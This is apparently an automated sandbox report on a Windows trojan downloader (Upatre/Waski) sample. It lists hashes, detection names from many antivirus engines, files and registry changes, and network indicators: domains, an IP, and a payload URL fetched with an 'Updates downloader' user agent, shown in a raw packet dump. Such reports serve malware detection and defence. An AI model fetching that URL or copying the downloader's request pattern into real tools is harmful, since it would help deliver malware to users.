Analysis Date2015-10-16 13:00:36
MD5b17691d326e81d01a1a2587bab90b1ec
SHA11b86ddcb2dee3d497faba1904a83af4372a6992e

Static Details:

File typePE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section.text md5: 9a13982b2d4f9a0d11c38303a15ed874 sha1: e716183327e2592ec1e1976c8a61688574dcee89 size: 6144
Section.rdata md5: f0c791b7a01c1af7476b9114f630f86f sha1: 1d74c769f3266d112fbfd99e06624cbddbfa7d72 size: 1536
Section.data md5: 308f2f2d626c29c61e6944c619d36bf1 sha1: 9d49af9013e6a959c3dc786c07e7154f8e4d9ba2 size: 512
Section.rsrc md5: 320a63c0552666c12f361d403bd803b5 sha1: da20a8f355a94e57d8e8adb1b834d44d411a046a size: 10240
Section.reloc md5: 1c6bd8f15b2d6e1575f05000eaa15adb sha1: 6694ebea140138563a76062c6828f1476956917c size: 512
Timestamp2014-02-05 03:58:40
PEhashb6248038e0af3e67a33a86bcc7288619ab5ee56f
IMPhash7772dfa3e3a72b92db47c13e7be36e20
AVCA (E-Trust Ino)Win32/Upatre.IHNQSfC
AVRisingno_virus
AVMcafeeDownloader-FSH!B17691D326E8
AVAvira (antivir)TR/Yarwi.B.175
AVTwisterTrojan.48B2FFB2E5D67CFC
AVAd-AwareTrojan.GenericKD.1559553
AVAlwil (avast)Zbot-TCT [Trj]
AVEset (nod32)Win32/TrojanDownloader.Waski.A
AVGrisoft (avg)Generic35.BQZI
AVSymantecBackdoor.Trojan
AVFortinetW32/Waski.AC!tr
AVBitDefenderTrojan.GenericKD.1559553
AVK7Trojan-Downloader ( 0040f7f11 )
AVMicrosoft Security EssentialsTrojanDownloader:Win32/Upatre.AA
AVMicroWorld (escan)Trojan.GenericKD.1559553
AVMalwareBytesTrojan.Email.FakeDoc
AVAuthentiumW32/Trojan.ARNH-0894
AVFrisk (f-prot)W32/Trojan3.HKX
AVIkarusTrojan-Downloader.Win32.Upatre
AVEmsisoftTrojan.GenericKD.1559553
AVZillya!Downloader.Injecter.Win32.5152
AVKasperskyTrojan-Downloader.Win32.Injecter.jir
AVTrend MicroTROJ_UPATRE.SM37
AVCAT (quickheal)TrojanDownloader.Upatre.A4
AVVirusBlokAda (vba32)TrojanDownloader.Injecter
AVPadvishDownloader.Win32.Injecter.ji_Generic
AVBullGuardTrojan.GenericKD.1559553
AVArcabit (arcavir)Trojan.GenericKD.1559553
AVClamAVWin.Trojan.Upatre-2359
AVDr. WebTrojan.DownLoad3.28161
AVF-SecureTrojan-Downloader:W32/Upatre.I

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\trueupdater.exe
Creates ProcessC:\Documents and Settings\Administrator\Local Settings\Temp\trueupdater.exe

Process
↳ C:\Documents and Settings\Administrator\Local Settings\Temp\trueupdater.exe

RegistryHKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝
NULL
RegistryHKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass ➝
1
Creates FileC:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates FileC:\Documents and Settings\Administrator\Cookies\index.dat
Creates FilePIPE\lsarpc
Creates File\Device\Afd\Endpoint
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Creates Mutexc:!documents and settings!administrator!local settings!history!history.ie5!
Creates MutexWininetConnectionMutex
Creates Mutexc:!documents and settings!administrator!cookies!
Creates Mutexc:!documents and settings!administrator!local settings!temporary internet files!content.ie5!
Winsock DNSoilwellme.com
Winsock DNSnewz24x.com

Network Details:

DNSoilwellme.com
Type: A
182.18.143.140
DNSnewz24x.com
Type: A
HTTP GEThttp://oilwellme.com/images/banners/pdf.enc
User-Agent: Updates downloader
HTTP GEThttp://oilwellme.com/images/banners/pdf.enc
User-Agent: Updates downloader
Flows TCP192.168.1.1:1031 ➝ 182.18.143.140:80
Flows TCP192.168.1.1:1032 ➝ 182.18.143.140:80

Raw Pcap
0x00000000 (00000)   47455420 2f696d61 6765732f 62616e6e   GET /images/bann
0x00000010 (00016)   6572732f 7064662e 656e6320 48545450   ers/pdf.enc HTTP
0x00000020 (00032)   2f312e31 0d0a4163 63657074 3a207465   /1.1..Accept: te
0x00000030 (00048)   78742f2a 2c206170 706c6963 6174696f   xt/*, applicatio
0x00000040 (00064)   6e2f2a0d 0a557365 722d4167 656e743a   n/*..User-Agent:
0x00000050 (00080)   20557064 61746573 20646f77 6e6c6f61    Updates downloa
0x00000060 (00096)   6465720d 0a486f73 743a206f 696c7765   der..Host: oilwe
0x00000070 (00112)   6c6c6d65 2e636f6d 0d0a4361 6368652d   llme.com..Cache-
0x00000080 (00128)   436f6e74 726f6c3a 206e6f2d 63616368   Control: no-cach
0x00000090 (00144)   650d0a0d 0a                           e....

0x00000000 (00000)   47455420 2f696d61 6765732f 62616e6e   GET /images/bann
0x00000010 (00016)   6572732f 7064662e 656e6320 48545450   ers/pdf.enc HTTP
0x00000020 (00032)   2f312e31 0d0a4163 63657074 3a207465   /1.1..Accept: te
0x00000030 (00048)   78742f2a 2c206170 706c6963 6174696f   xt/*, applicatio
0x00000040 (00064)   6e2f2a0d 0a557365 722d4167 656e743a   n/*..User-Agent:
0x00000050 (00080)   20557064 61746573 20646f77 6e6c6f61    Updates downloa
0x00000060 (00096)   6465720d 0a486f73 743a206f 696c7765   der..Host: oilwe
0x00000070 (00112)   6c6c6d65 2e636f6d 0d0a4361 6368652d   llme.com..Cache-
0x00000080 (00128)   436f6e74 726f6c3a 206e6f2d 63616368   Control: no-cach
0x00000090 (00144)   650d0a0d 0a                           e....


Strings